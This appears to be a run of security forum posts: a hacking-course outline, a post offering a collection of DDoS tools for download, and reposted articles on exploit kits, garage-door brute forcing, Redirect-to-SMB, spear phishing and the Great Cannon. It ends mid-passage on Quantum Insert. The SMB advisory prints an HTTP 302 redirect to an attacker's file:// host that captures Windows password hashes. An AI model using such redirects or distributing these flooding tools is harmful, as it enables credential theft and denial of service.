ow Attacks Knowledge Required to Program Buffer Overfl ow Exploits Understanding Stacks Understanding Heaps Types of Buffer Overfl ows: Stack-based Buffer Overfl ow o A Simple Uncontrolled Overfl ow of the Stack o Stack Based Buffer Overfl ows Types of Buffer Overfl ows: Heap-based Buffer Overfl ow o Heap Memory Buffer Overfl ow Bug o Heap-based Buffer Overfl ow Understanding Assembly Language o Shellcode How to Detect Buffer Overfl ows in a Program o Attacking a Real Program NOPs How to Mutate a Buffer Overfl ow Exploit Once the Stack is Smashed Defense Against Buffer Overfl ows o Tool to Defend Buffer Overfl ow: Return Address Defender (RAD) o Tool to Defend Buffer Overfl ow: StackGuard o Tool to Defend Buffer Overfl ow: Immunix System o Vulnerability Search: NIST o Valgrind o Insure++ Buffer Overfl ow Protection Solution: Libsafe o Comparing Functions of libc and Libsafe Simple Buffer Overfl ow in C o Code Analysis Cryptography Introduction to Cryptography Classical Cryptographic Techniques o Encryption o Decryption Cryptographic Algorithms RSA (Rivest Shamir Adleman) o Example of RSA Algorithm o RSA Attacks o RSA Challenge Data Encryption Standard (DES) o DES Overview RC4, RC5, RC6, Blowfi sh o RC5 Message Digest Functions o One-way Bash Functions o MD5 SHA (Secure Hash Algorithm) SSL (Secure Sockets Layer) What is SSH? o SSH (Secure Shell) Algorithms and Security Disk Encryption Government Access to Keys (GAK) Digital Signature o Components of a Digital Signature o Method of Digital Signature Technology o Digital Signature Applications o Digital Signature Standard o Digital Signature Algorithm: Signature Generation/Verifi cation o Digital Signature Algorithms: ECDSA, ElGamal Signature Scheme o Challenges and Opportunities Digital Certifi cates CypherCalc Command Line Scriptor CryptoHeaven Hacking Tool: PGP Crack Magic Lantern Advanced File Encryptor Encryption Engine Encrypt Files Encrypt PDF Encrypt Easy Encrypt my Folder Advanced HTML Encrypt and Password Protect Encrypt HTML source Alive File Encryption Omziff ABC CHAOS EncryptOnClick CryptoForge SafeCryptor CrypTool Microsoft Cryptography Tools Polar Crypto Light CryptoSafe Crypt Edit CrypSecure Cryptlib Crypto++ Library Code Breaking: Methodologies Cryptanalysis Cryptography Attacks Brute-Force Attack Penetration Testing Introduction to Penetration Testing (PT) Vulnerability Assessment Limitations of Vulnerability Assessment Penetration Testing Types of Penetration Testing Risk Management Do-It-Yourself Testing Outsourcing Penetration Testing Services Terms of Engagement Project Scope Pentest Service Level Agreements Testing points Testing Locations Automated Testing Manual Testing Using DNS Domain Name and IP Address Information Enumerating Information about Hosts on Publicly Available Networks Testing Network-fi ltering Devices Enumerating Devices Denial-of-Service Emulation Pentest using Appscan HackerShield Pen-Test Using Cerberus Internet Scanner Pen-Test Using Cybercop Scanner Pen-Test Using FoundScan Hardware Appliances Pen-Test Using Nessus Pen-Test Using NetRecon Pen-Test Using SAINT Pen-Test Using SecureNet Pro Pen-Test Using SecureScan Pen-Test Using SATAN, SARA and Security Analyzer Pen-Test Using STAT Analyzer Pentest Using VigilENT Pentest Using WebInspect Pentest Using CredDigger Pentest Using Nsauditor Evaluating Different Types of Pen-Test Tools Asset Audit Fault Tree and Attack Trees Business Impact of Threat Internal Metrics Threat External Metrics Threat Calculating Relative Criticality Test Dependencies Defect Tracking Tools: Bug Tracker Server Disk Replication Tools DNS Zone Transfer Testing Tools Network Auditing Tools Trace Route Tools and Services Network Sniffi ng Tools Denial of Service Emulation Tools Traditional Load Testing Tools System Software Assessment Tools Operating System Protection Tools Fingerprinting Tools Port Scanning Tools Directory and File Access Control Tools File Share Scanning Tools Password Directories Password Guessing Tools Link Checking Tools Web-Testing Based Scripting tools Buffer Overfl ow protection Tools File Encryption Tools Database Assessment Tools Keyboard Logging and Screen Reordering Tools System Event Logging and Reviewing Tools Hacking Routers, cable Modems and Firewalls Network Devices Identifying a Router o SING: Tool for Identifying the Router HTTP Confi guration Arbitrary Administrative Access Vulnerability ADMsnmp Solarwinds MIB Browser Brute-Forcing Login Services Hydra Analyzing the Router Confi g Cracking the Enable Password Tool: Cain and Abel Implications of a Router Attack Types of Router Attacks Router Attack Topology Denial of Service (DoS) Attacks Packet “Mistreating” Attacks Routing Table Poisoning Hit-and-run Attacks vs. Persistent Attacks Cisco Router o Finding a Cisco Router o How to Get into Cisco Router o Breaking the Password o Is Anyone Here o Covering Tracks o Looking Around Eigrp-tool Tool: Zebra Tool: Yersinia for HSRP, CDP, and other layer 2 attacks Tool: Cisco Torch Monitoring SMTP(port25) Using SLcheck Monitoring HTTP(port 80) Cable Modem Hacking
-
Cache Poisoning using DNS Transaction ID Prediction Example of a Cache Poisoning Attack on a DNS Server DNS Vulnerabilities in Shared Host Environments Example DNS Flooding – Creating a DNS Denial of Service Attack DNS Man in the Middle Attacks DNS Hijacking https://u.nya.is/ffkswv.pdf Sper să vă fie de folos. Recomandat de a se utiliza împreună cu o
-
Hello After Collecting Best Of Denial Of Service Attack Tools, I decided To Share Them With You So, I Already Scanned All Tools And Removed Backdored one This Is A list Of Tools : - Anonymous Doser - Hoic - Hulk - Loic - SlowLoris - Unknow Doser - XOIC This is A picture : Now For The Download Link:* ddos attack tools
- 7 replies
-
- attack
- collection
-
(and 3 more)
Tagged with:
-
Exploit Kits: Past, Present and Future March 16, 2015 View research paper: The Evolution of Exploit Kits Exploit kits are a fast-growing online threat that cybercriminals seem to have favored in the last few years to execute Web-based attacks to distribute malware. Exploit kits are old tools released by Russian programmers dating back to 2006. As seen in the diagram below, exploit kits have continuously grown in numbers from 2006 to 2013. The market seemingly changed and took a significant dip however in 2014. The rise of exploit kits in underground markets push exploit kit developers to improve the stealth and efficiency of their products and services. Currently, there are 70 different exploit kits found in the wild, taking advantage of more than a hundred vulnerabilities. What is an Exploit Kit? Exploit kits are programs or more often scripts that exploit vulnerabilities in programs or applications. The most prevalent exploits are browser exploits that enable the download of malicious files. Exploits introduce code to victims’ computers that then downloads and executes a malicious file. Several kits have since been developed and sold or rented out like commercial products in underground markets. The easiest hack toolkit made available in the crimeware market on record was seen sometime in 2006. A typical exploit kit usually provides a management console, several vulnerabilities targeted to different applications, and several add-on functions that make it easier for a cybercriminal to launch an attack. The Timeline Record of Exploit Kits The following research paper discusses the following: Exploit Kit Attack Scenario – there are four stages that illustrate how a typical attack scenario happens. Detailed below, the stages include contact, redirect, exploit, and finally, infect. Overview of 2014 Exploit Kit Activity – this section discusses the exploit kit trends traced back from 2006 to 2014, including its threat distribution. Exploit Kits are presently one of the most popular types of Web attack toolkits thriving in the cybercriminal underground market, and we predict that exploit kits will be more prevalent in 2015. Internet Explorer, Adobe Flash, and Adobe Reader are the most common software targeted by cybercriminals. Exploit kits pose serious security risks to all computer users ranging from private users to corporate networks. As such, it is critical to know and understand how exploit kits work, where they came from, what are the current trends, and how to defend against them. NO-MERCY Regards Source : Exploit Kits: Past, Present and Future - Security News - Trend Micro USA
-
Americans’ garages, those sacred suburban havens of automobiles and expensive tools, are probably more important to us than many of our online accounts. But some garages are only protected by a code whose security is equivalent to a two-character password. And security researcher Samy Kamkar can crack that laughable safeguard in seconds, with little more than a hacked child’s toy. On Thursday, Kamkar revealed a new tool he’s created called OpenSesame, which he says can open any garage door that uses an insecure “fixed code” system for its wireless communication with a remote. Built from a discontinued Mattel toy called the IM-ME, altered with a cheap antennae and an open source hardware attachment, Kamkar’s less-than-$100 device can try every possible combination for these garage doors and open them in seconds. “It’s a huge joke,” says Kamkar, a serial hacker who works as an independent developer and consultant. “The worst case scenario is that if someone wants to break into your garage, they can use a device you wouldn’t even notice in their pocket, and within seconds the garage door is open.” Before barricading or booby-trapping your garage against OpenSesame intruders, it’s important to note Kamkar’s exploit doesn’t work against just any garage door—only ones that respond to a “fixed code” wirelessly transmitted by a remote instead of a more secure “rolling code” that changes with every button press. And it’s not clear just how many garage doors actually use that fixed code system. Kamkar found that his own garage door, in a newly built Los Angeles condo, was vulnerable to his attack, though he couldn’t identify device’s manufacturer; the receiver in his building was hidden. When he checked the attack against two friends’ garage door openers—both made by a company called Linear owned by the parent company Nortek—it worked both times. Nortek didn’t immediately respond to WIRED’s request for comment. Another major brand of garage door opener, Genie, didn’t respond to to a request for comment either, but says on its website that its devices use rolling codes. A spokesperson for Chamberlain, the owner of the Liftmaster brand and one of the biggest sellers of garage door openers, initially told WIRED the company hasn’t sold fixed code doors since 1992. But when Kamkar dug up a 2007 manual for a Liftmaster device that seemed to use fixed codes, Chamberlain marketing executive Corey Sorice added that the company has supported and serviced older garage door openers until much more recently. “To the extent there are still operators in the market begin serviced by replacement parts, part of the objective is to get to safer and more secure products,” he said in a phone interview, using the industry term “operator” to mean a garage door opener. “We’d love to see people check the safety and security of their operators and move forward.” Kamkar has posted his own video to help people determine if their garage door is vulnerable or not. To attack fixed code garage door openers, criminals have for years used “code grabbers” that capture the code from a user’s garage door button press and replay it later to open the door. But for these vulnerable systems, Kamkar has reduced the time necessary so that it’s become practical try every possible wireless code. That means someone could walk or drive through a neighborhood, going door-to-door and trying the device until one of the vulnerable garages opens. “For code grabbers, you have to sit there and wait for the person to hit the button,” says Kamkar. “For this, [the victim] never even has to be there.” To perform his brute-force attack, Kamkar used a pre-smartphone toy called a Radica IM-ME. That chunky pink handheld device for wireless text messaging, once sold by Mattel, has been adopted by radio hackers because it’s capable of broadcasting and receiving at a broad range of frequencies. Kamkar added his own antenna to the IM-ME and used GoodFET, a tool built by well-known radio hacker Travis Goodspeed, to reprogram the IM-ME with his cracking program. The fixed-code garage door remotes Kamkar tested use at most 12 bit codes—that’s 4,096 possibilities. In modern computer security terms, that’s a trivial level of security: Kamkar calculates that a password with just two characters offers at least 5,184 possibilities. “Imagine if your bank only let you have a two character password,” Kamkar says. Using a straightforward cracking technique, it still would have taken Kamkar’s program 29 minutes to try every possible code. But Kamkar improved his attack by taking out wait periods between code guesses, removing redundant transmissions, and finally using a clever optimization that transmitted overlapped codes, what’s known as a De Bruijn sequence. With all those tweaks, he was able to reduce the attack time from 1,771 seconds to a mere eight seconds. Even so, that eight-second attack only works for a single frequency; Kamkar says he’s found four frequencies different for vulnerable garage doors he’s tested, and OpenSesame can cycle through its brute-force attack on all four frequencies in less than a minute. Kamkar has detailed OpenSesame’s attack on his website, and also published the tool’s code. But he intends it to serve as a warning, not a how-to manual. In fact, he says he’s even disabled the code so that criminals can’t use it, and wouldn’t comment on exactly how he’s crippled his exploit. That’s a rare move for Kamkar, and one that demonstrates how dangerous he believes his garage attack may be. OpenSesame is just the latest in a long string of high-profile hacks from Kamkar, who gained fame in 2007 when he launched a MySpace worm—what came to be known as the Samy worm—that added more than a million friends to his account in an hour. He’s also built a drone designed to seek out and wirelessly hijack other drones, and a 3-D printed robot that can crack Masterlock combination locks in seconds. Anyone with a garage door that still uses a fixed code system should seriously consider upgrading to a more secure rolling code receiver. But Kamkar hints he’s working on another hack that would extend his attack to rolling codes, too, though he’s not yet ready to release any details about it. If that rolling code hack turns out to be effective, there may be no such straightforward answer for garage door security. “It’s a sticky situation. I haven’t even figured out what I’m supposed to do to my own garage,” Kamkar says. “I don’t have a great solution for anyone, including myself.” Source
-
Hackers have managed to make a huge video billboard in Atlanta display an obscene image favoured by internet pranksters. It prompted calls to police, and soon after, the billboard's owner cut off its power supply. The hack came after a security researcher warned the company, which runs thousands of the video billboards, that they were vulnerable to attack. The FBI and Homeland Security are now investigating the hack. The attackers are believed to have been able to take over the billboard because it used an easy-to-guess password on its net-connected remote administration system. The billboard is owned by US electric-sign giant Yesco, which runs thousands of similar billboards across America. Other signs in other states are also believed to have had their images changed at the same time. Security expert Dan Tentler said in a tweet that he had warned Yesco about the potential for attack, but the company had told him that it was "not interested" in his information. Mr Tentler said it was easy to find hundreds of other signs on the internet that were vulnerable in the same way. Many of these signs were still online after the hack attack had taken place, he added. A group calling itself the Assange Shuffle Collective claimed responsibility for the attack, in a discussion on social news site Reddit. However, there has been no independent verification of the claim. Source
-
SPEAR - Redirect to SMB April 13, 2015 By Brian Wallace We’ve uncovered a new technique for stealing sensitive login credentials from any Windows PC, tablet or server, including ones running previews of the yet-to-be-released Windows 10 operating system. Software from at least 31 companies including Adobe, Apple, Box, Microsoft, Oracle and Symantec can be exploited using this vulnerability, which we have dubbed Redirect to SMB. Carnegie Mellon University CERT disclosed the vulnerability to the public today (#VU672268), following six weeks of working with vendors to help them mitigate the issue. Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim’s username, domain and hashed password. We are publishing a white paper that describes the issue in detail, and offers mitigation methods for both developers and computer users. For technical details, download the Redirect To SMB white paper. Original Attack The Redirect to SMB attack builds on a vulnerability discovered in 1997 by Aaron Spangler, who found that supplying URLs beginning with the word “file” (such as file://1.1.1.1/) to Internet Explorer would cause the operating system to attempt to authenticate with a SMB server at the IP address 1.1.1.1. It’s a serious issue because stolen credentials can be used to break into private accounts, steal data, take control of PCs and establish a beachhead for moving deeper into a targeted network. These “file” URLs could be provided as an image, iframe, or any other web resource resolved by the browser. We uncovered Redirect to SMB while hunting for ways to abuse a chat client feature that provides image previews. When a URL to an image was received, the client attempted to show a preview of the image. Inspired by Aaron’s research some 18 years ago, we promptly sent another user a URL starting with file:// which pointed to a malicious SMB server. Surely enough, the chat client tried to load the image, and the Windows user at the other end attempted to authenticate with our SMB server. RedirectToSMB-Diagram-1 While conducting previous research on network protocols, we had experimented with redirecting ordinary HTTP requests to web servers to identify new attacks. So we were curious to see what threats SMB posed when combined with redirects. We created an HTTP server in Python that answered every request with a simple HTTP 302 status code to redirect clients to a file:// URL, and using that we were able to confirm that an http:// URL could lead to an authentication attempt from the OS. GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0,( Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Endoding: gzip, deflate Host: 192.168.36.207 DNT: 1 Connection: Keep-Alive HTTP/1.1 302 Found Content-Type: text/html Location: file://192.168.36.207/mitmproxy-identifier Content-Length: 0 RedirectToSMB-Diagram-02 Increased Attack Surface We identified four commonly used Windows API functions that allow for redirection from HTTP/HTTPS to SMB. Early testing found that they are used by a wide range of software features such as updaters and usage reporting tools. This discovery opened up a wide range of new attack methods. When combined with a man-in-the-middle attack, an attacker can force authentication attempts with an SMB server using susceptible applications and services that transmit data over HTTP or HTTPS. RedirectToSMB-Diagram-03 Affected Applications We tested dozens of application in our lab, uncovering 31 vulnerable software packages, which we disclosed to CERT at Carnegie Mellon University on Feb. 27, 2015. They include: Widely Used Applications: Adobe Reader, Apple QuickTime and Apple Software Update (which handles the updating for iTunes) Microsoft Applications: Internet Explorer, Windows Media Player, Excel 2010, and even in Microsoft Baseline Security Analyzer Antivirus: Symantec’s Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus Security Tools: .NET Reflector, Maltego CE Team Tools: Box Sync, TeamViewer Developer Tools: Github for Windows, PyCharm, IntelliJ IDEA, PHP Storm, JDK 8u31’s installer Impact Redirect to SMB is most likely to be used in targeted attacks by advanced actors because attackers must have control over some component of a victim’s network traffic. Malicious ads could also be crafted that would force authentication attempts from IE users while hiding malicious behavior from those displaying the advertising. Less sophisticated attackers could launch Redirect to SMB attacks on shared WiFi access points at locations such as coffee shops from any computer, including mobile devices. We successfully tested this attack on a home network using a Nexus 7 loaded with all required tools. Examples The following examples show different attacks that could be conducted. In order to effectively demonstrate attack scenarios, the conditions have been simplified. The following are the IP addresses of the computers in the examples: • 192.168.36.207 – The Attacker • 192.168.36.247 – The Victim • 192.168.36.128 – The Router/Internet Gateway The tools in the examples are as follows: • SMBTrap2 • SMBTrap-mitmproxy-inline.py • MITMProxy • Zarp Additional attack examples are discussed in the white paper. Attacking AVG via ARP Poisoning Attacking Microsoft Baseline Security Analyzer via modified DNS record Encrypted Credentials While the user credentials sent over SMB are commonly encrypted, the encryption method used was devised in 1998 and is weak by today’s standards. A stronger hashing algorithm being used on these credentials would decrease the impact of this issue, but not as much as disabling automatic authentication with untrusted SMB servers. With roughly $3,000 worth of GPUs, an attacker could crack any 8-character password consisting of letters (upper and lower case) as well as numbers in less than half a day. Mitigations Microsoft has yet to release a patch to fix the Redirect to SMB vulnerability. The simplest workaround is to block outbound traffic from TCP 139 and TCP 445 -- either at the endpoint firewall or at the network gateway’s firewall (assuming you are on a trusted network). The former will block all SMB communication, which may disable other features that depend on SMB. If the block is done at the network gateway’s firewall, SMB features will still work inside the network, but prevent authentication attempts with destinations outside the network. See the white paper for other mitigation steps. Microsoft did not resolve the issue reported by Aaron Spangler in 1997. We hope that our research will compel Microsoft to reconsider the vulnerabilities and disable authentication with untrusted SMB servers. That would block the attacks identified by Spangler as well as the new Redirect to SMB attack. NO-MERCY Me & i & My self -> lIKE mICROSOFT :) Source ; SPEAR - Redirect to SMB & yOU Can See this Post too ; 18-year-old Unpatched Vulnerability Affects All Versions of Microsoft Windows
-
The United States expressed concern Friday over reports China has used a powerful censorship tool dubbed “Great Cannon” to attack websites around the world. Researchers reported in April that the “Great Cannon” is an online attack system used to hijack web traffic and enforce the country’s broad censorship of information online. The system was used to shut down websites aimed at helping Chinese bypass the country’s extensive online restrictions known as the “Great Firewall,” experts said. “We are concerned by reports that China has used a new cyber capability to interfere with the ability of worldwide internet users to access content hosted outside of China,” State Department spokesman Jeff Rathke said following a question about the program. Rathke said the cyber attack manipulated Chinese web traffic and “and turned it into malicious traffic directed at US sites.” “We have asked Chinese authorities to investigate this activity and provide us with the results of their investigation,” he said. Experts at the University of Toronto reported on the Great Cannon last month, noting denial of service attacks carried out by the system. The report supported claims by an activist organization which said China was seeking to shut down its online service that offer ways to access content from blocked websites. Great Cannon gives China cyberattack capabilities similar to the US National Security Agency’s Quantum program, revealed in documents leaked by former NSA contractor Edward Snowden, experts said. sursa: US 'Concerned' Over Reported Chinese Global Censorship Tool
-
Introduction: Spear phishing attacks Spear phishing and its evolutions like the watering hole attack represent one of the most insidious attack techniques adopted by the majority of threat actors in cyber space. According to the experts at Trend Micro security firm, spear phishing is the attack method used in some 91 percent of cyber attacks. Differently from a common phishing attack, in the spear phishing attack scenario bad actors target a subset of people, usually the employees of an organization, members of an association or visitors of a particular website. The purpose of the attack is to collect personal information and other sensitive data that would be used later in further attacks against the victims. The attack vector is usually an email message that appears to come from a legitimate entity, that requests an action from the victims. There are numerous variants of spear phishing: some phishing emails include malicious links to websites controlled by attackers, while others include a malicious attachment that infects the victim’s system. In recent attacks operated by several APT groups, the malicious email sent to the victims encouraged users to read Word or PDF documents that were specifically crafted to exploit vulnerabilities in the web browser in order to compromise the host. Analyzing data related to the cyber attacks that occurred in the last five years, it is easy to deduct that spear phishing represents the easiest way for an attacker to compromise enterprises and organizations of any size. The “Operation Aurora” attack (2010), the hack (2011), the Target breach (2013), and the most recent Sony Entertainment (2014) and the cyber attacks operated by Operation Carbanak and the Syrian Electronic Army are just a few examples of offensives that relied on spear phishing as an infection method. The key to the success of a spear phishing attack is that it relies on the weakest link of a security chain, humans. Another characteristic of a spear phishing attack is that the content shared with the victims of an attack is usually highly customized to the recipient to increase the chance of exploitation. Social engineering techniques entice users to click on malicious attachments and links by suggesting they may be topics of interest for the victims. Spear phishing and terrorism Terrorism is defined as violent conduct or the threat of violent acts conducted with the purpose to create a climate of terror and damage the critical operations of a nation. We must consider that today’s society heavy relies on technologies, the majority of services that we access every day strongly depend on IT systems. This is particularly evident in some industries like defense, energy, telecommunications and banking. For this reason terrorism is enlarging its spectrum of action and is targeting IT services whose destruction can have the effects of an old style terrorist attack. Terrorists have several ways to use technology for their operations, and once again, the spear phishing methodology could help them to realize their plans. Let’s imagine together some attack scenarios and the way a spear phishing attack could help a terrorist to hit the collective. Terrorists can directly target the services compromising their operations. A number of services are based on sophisticated infrastructure managed by humans. By interrupting them, it is possible to create serious damage to the victims and to the population. Let’s imagine a cyber attack against a bank that will cause the interruption of the operations of a financial institution, or a cyber attack against telecommunication systems of a national carrier. Suddenly the users will have no opportunity to withdraw money from their bank accounts, or they will be isolated due to the interruption of the service of the telecommunications carrier; both events would create panic among the population. Again, let’s think to cyber attacks against the transmission of a broadcaster or an energy grid of a state. Also in this case, the impact on the public order could be dramatic. All the systems that could be targeted by the attacks mentioned rely on both an IT system and a human component, and human operators are the element that could be targeted by terrorists using spear phishing attacks that could give them the opportunity to infiltrate the computer systems and move laterally inside the systems of the service provider. Unfortunately, the attack scenarios described are feasible, and attacks with similar consequences on the final services have already occurred. In those cases, the threat actors were state-sponsored hackers and cyber criminals that mainly operated for cyber espionage and for profit, but in the case of a terrorist attack, the final goal is more dangerous: the destruction itself. Terrorists can run a spear phishing attack for information gathering Information gathering through a spear phishing technique is the privileged choice for a terrorist. Cells of terrorists could use this attack method to spread malware and hack into computers and mobile phones of persons of interest with the intent to collect information on their social network and related to the activities they are involved in. Spear phishing could allow terrorists to collect information on a specific target or to access information related to investigation on members of the group. Let’s imagine a spear phishing attack on personnel of a defense subcontractor that could give the terrorist precious information about security measures in place in a specific area that the terrorist cell intends to attack. Online scams to finance activities of cells Spear phishing attacks could be used by terrorists to finance small operations. The attacks can be carried out with the intent to conduct online frauds and the proceeds, albeit modest, may also finance the purchase of weapons and false documents in the criminal underground. The terrorists operate online purchases that enable cells to avoid controls exercised by the intelligence agencies in the area. Terrorists groups become more tech-savvy Terrorist groups like ISIS and Al Qaeda have become more tech-savvy, and among their members there are also security experts with a deep knowledge of hacking techniques, including social engineering and spear phishing. Spear phishing is the privileged technique to steal sensitive information from corporate or government entities that the terrorists plan to hit. Unfortunately, the skills necessary to hack SCADA systems of a critical infrastructure are less and less specialized, because on the Internet it is easy to find numerous exploits ready for use. Very often, it is sufficient to know the credentials of a VPN service used to access the SCADA system remotely in order to hack it. Terrorists are aware of this, and spear phishing attacks against the staff that manages the systems in the critical infrastructure would provide all the necessary information to attack the internal network structure and launch the exploit to hack the SCADA systems. Resuming, a spear phishing attack could give an attacker the information necessary to damage processes of a nuclear power plant, a water facility systems or a satellite systems. Another factor that incentivizes the use of spear phishing attacks by terrorists is that this kind of attack for information gathering could be conducted remotely without arousing suspicion. ISIS operates spear phishing attacks against a Syrian citizen media group The demonstration that the terrorist group of the Islamic State in Iraq and Syria (ISIS) is using spear phishing techniques against opponents was provided by Citizen’s Lab, which published a detailed report on a hacking campaign run by the members of the organization against the Syrian citizen media group known as Raqqah is being Slaughtered Silently (RSS). The hackers operating for ISIS run the spear phishing campaign to unmask the location of the militants of the RSS with the intent to kill them. The Syrian group RSS is an organization that in several cases has criticized the abuses made by ISIS members during the occupation of the city of Ar-Raqqah, located in northern Syria. “A growing number of reports suggest that ISIS is systematically targeting groups that document atrocities, or that communicate with Western media and aid organizations, sometimes under the pretext of finding ‘spies’.” ISIS members are persecuting local groups searching for alleged spies of Western governments. The spear phishing campaign run by the terrorists allowed the members of ISIS to serve a malware to infect the computers of the opponents and track them. The experts at Citizen’s Lab uncovered the spear phishing campaign managed to target the RSS members. “Though we are unable to conclusively attribute the attack to ISIS or its supporters, a link to ISIS is plausible,” Citizen’s Lab noted. “The malware used in the attack differs substantially from campaigns linked to the Syrian regime, and the attack is focused against a group that is an active target of ISIS forces.” The malicious emails contain a link to a decoy file, which is used by attackers to drop a custom spyware on the victim’s machine. “The unsolicited message below was sent to RSS at the end of November 2014 from a Gmail email address. The message was carefully worded, and contained references specific to the work and interests of RSS,” states the report. “The custom malware used in this attack infects a user who views the decoy “slideshow,” and beacons home with the IP address of the victim’s computer and details about his or her system each time the computer restarts.” The researchers at Citizen’s Lab have noticed that the malicious code served through the spear phishing campaign is different from the Remote Access Trojans used by the hackers backed by the Syrian Government. Figure 1 – Slideshow.zip file used by ISIS members in the spear phishing campaign One of the principal differences is related to the control infrastructure. The members of the ISIS used an email account to gather information from compromised machines. “Unlike Syrian regime-linked malware, it contains no Remote Access Trojan (RAT) functionality, suggesting it is intended for identifying and locating a target,” said CL. “Further, because the malware sends data captured by the malware to an email address, it does not require that the attackers maintain a command-and-control server online. This functionality would be especially useful to an adversary unsure of whether it can maintain uninterrupted Internet connectivity.” Western intelligence collected evidence of the presence of hackers among the members of ISIS. According to some experts, members of ISIS are already working to secure communications between ISIS members and supporting the group to spread propaganda messages avoiding detection. “In addition, ISIS has reportedly gained the support of at least one individual with some experience with social engineering and hacking: Junaid Hussain (aka TriCk), a former member of teamp0ison hacking team. While Mr. Hussain and associates have reportedly made threats against Western governments, it is possible that he or others working with ISIS have quietly supported an effort to identify the targeted organization, which is a highly visible thorn in the side of ISIS.” ISIS members are targeting many other individuals with spear phishing attacks – for example, it has been documented that it targeted Internet cafés in Syria and Iraq that are used by many hacktivits. “Reports about ISIS targeting Internet cafés have grown increasingly common, and in some cases reports point to the possible use of keyloggers as well as unspecified IP sniffers to track behavior in Internet cafes,” Citizen’s Lab reported. Citizen’s Lab seems to be confident of the involvement of a non state-actors in the attack, and ISIS is a plausible suspect. “After considering each possibility, we find strong but inconclusive circumstantial evidence to support a link to ISIS,” CL said. “Whether or not ISIS is responsible, this attack is likely the work of a non-regime threat actor who may be just beginning to field a still-rudimentary capability in the Syrian conflict. The entry costs for engaging in malware attacks in a conflict like the Syrian Civil War are low, and made lower by the fact that the rule of law is nonexistent for large parts of the country.” The Energy industry – A privileged target for a terrorist attack The energy industry is probably the sector more exposed to the risk of terrorist attacks, as energy grids, nuclear plants, and water facilities represent a privileged target for terrorists. Spear phishing attacks could allow terrorists hit systems in the critical infrastructure to destroy the operations or could allow bad actors to gather sensitive information to organize a terrorist attack. The spear phishing campaign could be run against the personnel of a targeted infrastructure to gather sensitive information on defense mechanisms in place and ways to breach them. The last report issued by the DHS’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the ICS-CERT MONITOR report related to the period September 2014 – February 2015, revealed that the majority of the attacks involved entities in the Energy Sector followed by those in Critical Manufacturing. Figure 2 – ICS-CERT MONITOR report related to the period September 2014 – February 2015 Spear phishing attacks appear among the principal attack vectors adopted by threat actors, but it is important to highlight that the report doesn’t mention cyber terrorism among possible motivations for the attacks. The fact that spear phishing attacks are effective to compromise the systems in the energy sector should make us reflect on the potential effectiveness of the cyber threat if it is adopted by terrorist groups. In April 2014, security experts at Symantec discovered a cyber espionage campaign targeting energy companies around the world by infecting them with a new trojan dubbed Laziok. Also in this case, the attack chain starts with a spear phishing attack. The emails used by hackers come from the moneytrans[.]eu domain, which acts as an open relay Simple Mail Transfer Protocol (SMTP) server. The e-mails contain an attachment, typically in the form of an Excel file, that exploits a well-known Microsoft Windows vulnerability patched in 2012 and that was exploited by threat actors behind Red October and CloudAtlas campaigns. The experts confirmed that the bad actors who used Trojan.Laziok malware to target energy companies haven’t adopted a sophisticated hacking technique. The investigation demonstrated that they exploited an old vulnerability by using exploit kits easy to find in the underground market. This kind of operation could be potentially conducted by groups of terrorists that intend to collect information on the IT infrastructure adopted by an organization to compromise it and cause serious damages to the process of a refinery or a nuclear plant. Since now security experts have no evidence for the availability of zero-day exploits in the arsenal of terrorists, the spear phishing campaign run by groups linked to the ISIS or Al-Qaida are quite different from the attacks run by APT groups backed by governments. Unfortunately, it is impossible to exclude that in the future group of terrorists with significant financial resources will have access to the underground market of zero-day exploits and purchase them to conduct targeted campaigns aimed to cause destruction and the lost of human lives. Conclusion Spear phishing represents a serious threat for every industry, and the possibility that a group of terrorists will use this technique is concrete. To prevent spear phishing attacks, it is crucial to raise awareness of the mechanics behind these kind of offensives. By sharing the knowledge of the techniques and tactics of the threat actors, it is possible to reduce in a significant way the likelihood and impact of spear phishing campaigns. To prevent spear phishing attacks, it is necessary that everyone in an organization has a deep knowledge of the threat and defense mechanisms. The pillars for an effective defense against the spear phishing attacks are: Awareness of the cyber threat Implementation of effective email filtering Implementation of effective network monitoring Spear phishing attacks are still a primary choice for cyber criminals and intelligence agencies that intend to steal money and sensitive information, but the technique could be a dangerous weapon to start a cyber terrorism attack. In order to protect our society we must trigger a collective defense. As explained by many security experts, the government cannot prevent spear-phishing attacks against private firms, but a successful attack against private industrial systems can be used to harm the security of a nation and take innocent lives. For this reason, it is important to share information on ongoing spear-phishing attacks and track potentially dangerous threat actors, especially cyber terrorists. Homeland security and national defense need a collective effort! References ISIS operates spear phishing attacksSecurity Affairs Phishing: A Very Dangerous Cyber Threat - InfoSec Institute The US energy industry is constantly under cyber attacksSecurity Affairs Energy companies infected by newly Laziok trojan malwareSecurity Affairs ICS-CERT- Most critical infrastructure attacks involve APTsSecurity Affairs http://techcrunch.com/2015/03/27/spear-phishing-could-enable-cyberterrorism-attacks-against-the-u-s/ http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-spear-phishing-email-most-favored-apt-attack-bait.pdf https://citizenlab.org/2014/12/malware-attack-targeting-syrian-isis-critics/ Phishing: A Very Dangerous Cyber Threat - InfoSec Institute Source
-
A Quantum Insert Attack is a classic example of man-in-the-middle attacks which resurfaced into news among the top 10 biggest leaks by WikiLeaks founder Edward Snowden. The NSA and Britain’s GCHQ intelligence services allegedly used it against OPEC and Belgacom successfully for their benefit. In short – Quantum is a code name for the servers which are strategically placed by NSA and GCHQ that can respond faster to a request than the intended recipient. The attacker would need monitoring capabilities to successfully attack the victim. Once the quantum servers win the race condition against the original response, the attacker can steal sensitive data like login credentials, bank account details, and credit card numbers or even spread a malware which can work in tandem with a botnet C&C server. Understanding the attack The attack begins with the attacker gaining monitoring capabilities into the victim’s network. In a government sponsored attack, the monitoring capabilities can be gained by Internet Service Providers and in the case of cyber espionage crimes, having access within a network looking to move laterally inside. This kind of attack is generally not used for large scale attacks, instead the attacker is very well aware of his target and most frequently used websites. In the past, Snowden leaks revealed that LinkedIn and Slashdot users have been targeted for attacks. The crux of the attack is in winning the race condition against the legitimate response packets. The schematic diagram here will help you understand better: Step 1: Step 2: Step 3: In the above schematic diagram, we see that the attacker waits on the network for the target to initiate a 